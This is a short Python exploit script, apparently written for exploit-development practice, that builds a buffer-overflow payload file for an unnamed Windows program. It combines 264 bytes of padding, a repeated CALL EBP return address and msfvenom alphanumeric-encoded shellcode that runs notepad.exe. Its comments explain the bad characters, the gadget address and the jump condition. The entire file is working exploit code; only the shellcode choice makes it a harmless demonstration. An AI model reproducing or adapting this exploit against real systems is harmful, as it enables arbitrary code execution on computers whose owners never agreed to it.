import os
import subprocess
#Enes Şakir ÇOLAK - ZAYOTEM

# Need an address to "call ebp" but don't forget this address's bytes can not be between 0x0-0x20 (ff d5 -> call ebp, you can search with it)
# Also you need to check  nop's last dword value. That value has to be an address and 8 bytes behind that address has to be negative value to set SF with "dec ecx". Then JL will taken. 

f = open("payload.txt","wb")    
#00 - 0x20 badchar
padding = 264 * b"A"  

#Call EBP
jmp = 7*  b"\x9A\x47\xCF\x75"      # Address to return value -> CALL EBP

#jmp's last dword value is an address and it has to be checked. 
#If dword[address-8] value is negative according to calculation it is okay [dec ecx]
#set breakpoint to see this function-> offset 0x3994 [dec ecx -> 0x39A3]


#buf = msfvenom -p windows/exec cmd=notepad.exe -f c -e x86/alpha_mixed
buf =  b""
buf += b"\x89\xe1\xda\xd8\xd9\x71\xf4\x5d\x55\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x7a\x48\x4c"
buf += b"\x42\x57\x70\x33\x30\x67\x70\x43\x50\x6e\x69\x4a\x45"
buf += b"\x76\x51\x79\x50\x42\x44\x6e\x6b\x66\x30\x64\x70\x4c"
buf += b"\x4b\x36\x32\x46\x6c\x4e\x6b\x61\x42\x57\x64\x6e\x6b"
buf += b"\x32\x52\x35\x78\x34\x4f\x4f\x47\x62\x6a\x66\x46\x46"
buf += b"\x51\x49\x6f\x4e\x4c\x75\x6c\x63\x51\x43\x4c\x63\x32"
buf += b"\x34\x6c\x77\x50\x6a\x61\x78\x4f\x64\x4d\x53\x31\x68"
buf += b"\x47\x38\x62\x6a\x52\x76\x32\x61\x47\x4e\x6b\x72\x72"
buf += b"\x34\x50\x4e\x6b\x72\x6a\x65\x6c\x4e\x6b\x62\x6c\x67"
buf += b"\x61\x62\x58\x7a\x43\x77\x38\x47\x71\x6e\x31\x62\x71"
buf += b"\x4e\x6b\x30\x59\x57\x50\x56\x61\x78\x53\x4c\x4b\x63"
buf += b"\x79\x36\x78\x49\x73\x65\x6a\x42\x69\x6e\x6b\x76\x54"
buf += b"\x6c\x4b\x66\x61\x7a\x76\x45\x61\x4b\x4f\x4e\x4c\x5a"
buf += b"\x61\x68\x4f\x56\x6d\x46\x61\x6f\x37\x47\x48\x49\x70"
buf += b"\x74\x35\x68\x76\x55\x53\x61\x6d\x7a\x58\x55\x6b\x61"
buf += b"\x6d\x74\x64\x50\x75\x69\x74\x51\x48\x6e\x6b\x61\x48"
buf += b"\x56\x44\x63\x31\x38\x53\x75\x36\x4c\x4b\x64\x4c\x70"
buf += b"\x4b\x4e\x6b\x46\x38\x67\x6c\x57\x71\x58\x53\x4c\x4b"
buf += b"\x36\x64\x4e\x6b\x53\x31\x38\x50\x4f\x79\x77\x34\x65"
buf += b"\x74\x65\x74\x43\x6b\x71\x4b\x73\x51\x70\x59\x72\x7a"
buf += b"\x30\x51\x69\x6f\x69\x70\x61\x4f\x63\x6f\x52\x7a\x4c"
buf += b"\x4b\x36\x72\x38\x6b\x6c\x4d\x61\x4d\x70\x6a\x55\x51"
buf += b"\x6e\x6d\x6b\x35\x4d\x62\x65\x50\x47\x70\x73\x30\x66"
buf += b"\x30\x70\x68\x74\x71\x6c\x4b\x70\x6f\x4f\x77\x49\x6f"
buf += b"\x58\x55\x4d\x6b\x4a\x50\x4e\x55\x4e\x42\x56\x36\x42"
buf += b"\x48\x4d\x76\x6f\x65\x4f\x4d\x4d\x4d\x39\x6f\x58\x55"
buf += b"\x47\x4c\x36\x66\x63\x4c\x77\x7a\x6f\x70\x49\x6b\x79"
buf += b"\x70\x72\x55\x57\x75\x6d\x6b\x50\x47\x75\x43\x74\x32"
buf += b"\x62\x4f\x53\x5a\x53\x30\x71\x43\x79\x6f\x58\x55\x30"
buf += b"\x6e\x72\x4f\x30\x74\x53\x55\x34\x30\x31\x71\x62\x44"
buf += b"\x54\x6e\x32\x45\x70\x78\x71\x75\x75\x50\x41\x41"

f.write(padding+jmp+ buf)
f.close()